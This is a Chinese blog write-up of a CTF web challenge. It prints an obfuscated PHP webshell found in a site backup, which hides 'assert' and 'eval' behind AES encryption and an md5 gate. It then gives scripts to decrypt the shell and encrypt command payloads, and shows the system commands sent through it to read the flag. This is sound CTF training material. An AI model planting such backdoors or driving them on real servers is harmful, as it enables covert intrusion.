241026 网鼎杯模拟 Web3

于 2024-11-03 21:57:10 发布
阅读量420 收藏 4
点赞数 3
文章标签: ctf 网络 网络安全 web安全 安全
https://www.hestudio.net/docs/copyright.html
本文链接:https://blog.youkuaiyun.com/a18845594188/article/details/143471844
版权

尝试扫描目录,可找到wwwroot的备份文件,我们可以将文件下载。

下载任意一个备份文件,解压文件。

找到特征最明显的文件(其他文件开头为大写字母,该文件开头为小写字母)
"describedssTest.php ",将其代码格式化后可得

<?php error_reporting(0);
header('Content-type: text/html; charset=utf-8');
$p8 = '3b7430adaed18facca7b799229138b7b';
$a8 = 'TURNeU9UWTBOelUwTmprd05UUTVOR0ZLV1ZwdU9XSkZORmh2WnpoS1RrNW1jRTFrTkdjOVBRPT0=';
$d8 = 'TURNeU9UWTBOelUwTmprd05UUTVOR012V1c5cVJXNXBkWEJyZDFsemJsQlpNMmRITjNaYWVFVnFPVWRqVnpoWlUyNXZNbmhDU21jd2RHTkxRazF2U1hvMU9FNUNWM2RNUjFWYVJuVnBiV3czUlVwUldFMTFhakp2VjJKS1NIVlJUMU5UYjNoSWExUk5hMlZXY21OdlRuaHVRMjlsVkV4aEwzbGpQUT09';
$v8 = '0329647546905494';
function e($D, $K)
{
  $cipher = 'aes-128-cbc';
  $encrypted = openssl_encrypt($D, $cipher, $K, 0, $GLOBALS['v8']);
  $result = base64_encode($GLOBALS['v8'] . $encrypted);
  $result = base64_encode($result);
  return $result;
}
function d($D, $K)
{
  $cipher = 'aes-128-cbc';
  $decodedData = base64_decode(base64_decode($D));
  $encryptedData = substr($decodedData, openssl_cipher_iv_length($cipher));
  $decrypted = openssl_decrypt($encryptedData, $cipher, $K, 0, $GLOBALS['v8']);
  return $decrypted;
}
$a8 = trim(d($a8, $p8));
ob_start();
$a8(trim(d($d8, $p8)));
$O = ob_get_contents();
ob_end_clean();
echo e($O, $p8);

编写 a 8 和 a8和 a8b8的解密脚本

<?php 
error_reporting(0); 
header('Content-type: text/html; charset=utf-8'); 
// 定义密钥和IV 
$p8 = '3b7430adaed18facca7b799229138b7b'; 
$v8 = '0329647546905494'; 
// 解密函数 
function d($D, $K) 
{ 
$cipher = 'aes-128-cbc'; 
$decodedData = base64_decode(base64_decode($D)); 
$encryptedData = substr($decodedData, openssl_cipher_iv_length($cipher)); 
$decrypted = openssl_decrypt($encryptedData, $cipher, $K, 0, $GLOBALS['v8']); 
return $decrypted; 
} 
// 解密 $a8 和 $d8 的内容 
$a8_encrypted = 
'TURNeU9UWTBOelUwTmprd05UUTVOR0ZLV1ZwdU9XSkZORmh2WnpoS1RrNW1jRTFrTkdjOVBRPT0='; 
$d8_encrypted = 
'TURNeU9UWTBOelUwTmprd05UUTVOR012V1c5cVJXNXBkWEJyZDFsemJsQlpNMmRITjNaYWVFVnFPVWRqVnpoWlUyNXZNbmhDU21jd2RHTkxRazF2U1hvMU9FNUNWM2RNUjFWYVJuVnBiV3czUlVwUldFMTFhakp2VjJKS1NIVlJUMU5UYjNoSWExUk5hMlZXY21OdlRuaHVRMjlsVkV4aEwzbGpQUT09'; 
// 解密结果 
$a8_decrypted = d($a8_encrypted, $p8); 
$d8_decrypted = d($d8_encrypted, $p8); 
echo "解密后的 \$a8 内容: " . $a8_decrypted . "\n"; 
echo "解密后的 \$d8 内容: " . $d8_decrypted . "\n"; 
?>

输出的结果为

解密后的 $a8 内容: assert 
解密后的 $d8 内容: @eval("if(md5(@\$_GET['id'])===\$p8){@eval(trim(d(\$_POST['d'],\$p8)));}")

分析代码可得,通过query传入id的md5值为$p8,通过md5爆破可得
id=04c50eb4bc04c76311d03550ee2c1b71
, 当条件为TRUE时,解密d参数然后运行,我们需要传入加密的d参数。

编写加密和解密的代码如下

加密:

<?php 
error_reporting(0); 
header('Content-type: text/html; charset=utf-8'); 
$p8 = '3b7430adaed18facca7b799229138b7b'; 
$a8 = 
'TURNeU9UWTBOelUwTmprd05UUTVOR0ZLV1ZwdU9XSkZORmh2WnpoS1RrNW1jRTFrTkdjOVBRPT0='; 
$d8 = 
'TURNeU9UWTBOelUwTmprd05UUTVOR012V1c5cVJXNXBkWEJyZDFsemJsQlpNMmRITjNaYWVFVnFPVWRqVnpoWlUyNXZNbmhDU21jd2RHTkxRazF2U1hvMU9FNUNWM2RNUjFWYVJuVnBiV3czUlVwUldFMTFhakp2VjJKS1NIVlJUMU5UYjNoSWExUk5hMlZXY21OdlRuaHVRMjlsVkV4aEwzbGpQUT09'; 
$v8 = '0329647546905494'; 
 
function e($D, $K) 
{ 
    $cipher = 'aes-128-cbc'; 
    $encrypted = openssl_encrypt($D, $cipher, $K, 0, $GLOBALS['v8']); 
    $result = base64_encode($GLOBALS['v8'] . $encrypted); 
    $result = base64_encode($result); 
    return $result; 
} 
 
function d($D, $K) 
{ 
    $cipher = 'aes-128-cbc'; 
    $decodedData = base64_decode(base64_decode($D)); 
    $encryptedData = substr($decodedData, openssl_cipher_iv_length($cipher)); 
    $decrypted = openssl_decrypt($encryptedData, $cipher, $K, 0, $GLOBALS['v8']); 
    return $decrypted; 
} 
 
$c = e("此处输入加密文本", $p8); 
echo $c;
?>

解密:

<?php 
error_reporting(0); 
 
header('Content-type: text/html; charset=utf-8'); 
 
$p8 = '3b7430adaed18facca7b799229138b7b'; 
 
$a8 = 
'TURNeU9UWTBOelUwTmprd05UUTVOR0ZLV1ZwdU9XSkZORmh2WnpoS1RrNW1jRTFrTkdjOVBRPT0='; 
 
$d8 = 
'TURNeU9UWTBOelUwTmprd05UUTVOR012V1c5cVJXNXBkWEJyZDFsemJsQlpNMmRITjNaYWVFVnFPVWRqVnpoWlUyNXZNbmhDU21jd2RHTkxRazF2U1hvMU9FNUNWM2RNUjFWYVJuVnBiV3czUlVwUldFMTFhakp2VjJKS1NIVlJUMU5UYjNoSWExUk5hMlZXY21OdlRuaHVRMjlsVkV4aEwzbGpQUT09'; 
 
$v8 = '0329647546905494'; 
 
function e($D, $K) 
{ 
$cipher = 'aes-128-cbc'; 
$encrypted = openssl_encrypt($D, $cipher, $K, 0, $GLOBALS['v8']); 
$result = base64_encode($GLOBALS['v8'] . $encrypted); 
$result = base64_encode($result); 
return $result; 
} 
function d($D, $K) 
{ 
$cipher = 'aes-128-cbc'; 
$decodedData = base64_decode(base64_decode($D)); 
$encryptedData = substr($decodedData, openssl_cipher_iv_length($cipher)); 
$decrypted = openssl_decrypt($encryptedData, $cipher, $K, 0, $GLOBALS['v8']); 
return $decrypted; 
} 
$c = "此处输入要解密的文本"; 
echo d($c, $p8); 
?>

使用harkbar插件发包, 依次加密以下内容并发包

  • system("ls -a");
  • system("ls -a /");

通过遍历根目录,发现特征文件flag.txt

然后加密system("cat /flag.txt");, 传参后解密可获得flag

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

醉、倾城

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值